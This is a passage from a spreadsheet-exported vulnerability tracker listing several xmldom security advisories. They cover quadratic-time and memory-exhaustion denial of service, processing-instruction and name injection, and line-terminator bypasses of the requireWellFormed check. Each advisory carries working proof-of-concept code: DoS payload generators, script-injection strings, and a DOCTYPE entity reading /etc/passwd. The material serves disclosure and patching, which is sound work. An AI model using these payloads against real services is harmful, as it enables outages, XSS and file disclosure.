for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```

Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):

Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):

| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |

Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):

| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |

Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):

| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |

~32 KB of input → several seconds of single-threaded event-loop stall.

### Finding B via the public `normalize()` API (no parser)

```js
const { DOMImplementation } = require('@xmldom/xmldom');

function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```

Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):

| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |

This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.

## Fix Applied

Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t></is></c><c r="T1624" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="1625"><c r="A1625" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1625" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1625" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D1625" s="5" t="inlineStr" /><c r="E1625" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1625" s="5" t="inlineStr" /><c r="H1625" s="5" t="n"><v>0.004</v></c><c r="I1625" s="5" t="inlineStr" /><c r="J1625" s="5" t="inlineStr" /><c r="K1625" s="5" t="inlineStr" /><c r="L1625" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1625" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1625" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1625" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1625" s="5" t="inlineStr" /><c r="R1625" s="5" t="inlineStr" /><c r="S1625" s="5" t="inlineStr"><is><t>## Summary

When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.

## Details

`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:

```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```

https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540

The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.

## Proof of Concept

A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):

```js
const { DOMParser } = require('@xmldom/xmldom');

function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}

for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```

Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):

| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |

About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).

## Impact

Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).

## Severity note

The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.

## Fix Applied

Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T1625" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="1626"><c r="A1626" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1626" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1626" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D1626" s="5" t="inlineStr" /><c r="E1626" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1626" s="5" t="inlineStr" /><c r="H1626" s="5" t="n"><v>0.003</v></c><c r="I1626" s="5" t="inlineStr" /><c r="J1626" s="5" t="inlineStr" /><c r="K1626" s="5" t="inlineStr" /><c r="L1626" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1626" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1626" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1626" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1626" s="5" t="inlineStr" /><c r="R1626" s="5" t="inlineStr" /><c r="S1626" s="5" t="inlineStr"><is><t>## Summary

`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.

## Details

`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.

During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:

1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)

However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.

### Root Cause

1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`

## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Injecting elements via PI target

```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);

const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```

## Impact

Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:

- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security

## Fix Applied

Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;

// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)

### Residual limitation

The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t></is></c><c r="T1626" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="1627"><c r="A1627" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1627" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1627" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D1627" s="5" t="inlineStr" /><c r="E1627" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1627" s="5" t="inlineStr" /><c r="H1627" s="5" t="n"><v>0.003</v></c><c r="I1627" s="5" t="inlineStr" /><c r="J1627" s="5" t="inlineStr" /><c r="K1627" s="5" t="inlineStr" /><c r="L1627" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1627" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1627" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1627" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1627" s="5" t="inlineStr" /><c r="R1627" s="5" t="inlineStr" /><c r="S1627" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.

## Details

xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.

The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).

// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```

## Impact

- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.

## Fix Applied

The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);

// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```

### Why the default stays verbatim

The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t></is></c><c r="T1627" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="1628"><c r="A1628" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1628" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1628" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D1628" s="5" t="inlineStr" /><c r="E1628" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1628" s="5" t="inlineStr" /><c r="H1628" s="5" t="n"><v>0.003</v></c><c r="I1628" s="5" t="inlineStr" /><c r="J1628" s="5" t="inlineStr" /><c r="K1628" s="5" t="inlineStr" /><c r="L1628" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1628" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1628" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1628" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1628" s="5" t="inlineStr" /><c r="R1628" s="5" t="inlineStr" /><c r="S1628" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.

## Details

`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Affected Versions

Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.

## Fix Applied

The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);

// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;

// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```

### Why the default stays verbatim

The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.

### Residual limitation

The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t></is></c><c r="T1628" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="1629"><c r="A1629" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1629" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1629" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D1629" s="5" t="inlineStr" /><c r="E1629" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1629" s="5" t="inlineStr" /><c r="H1629" s="5" t="n"><v>0.003</v></c><c r="I1629" s="5" t="inlineStr" /><c r="J1629" s="5" t="inlineStr" /><c r="K1629" s="5" t="inlineStr" /><c r="L1629" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1629" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N1629" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1629" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1629" s="5" t="inlineStr" /><c r="R1629" s="5" t="inlineStr" /><c r="S1629" s="5" t="inlineStr"><is><t>## Summary

On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.

## Details

`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:

- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120

```js
/[ \t\n\r]+$/g
```

Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.

## Proof of Concept

```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```

Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):

| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.

## Affected Versions

Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).

## Fix Applied

Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
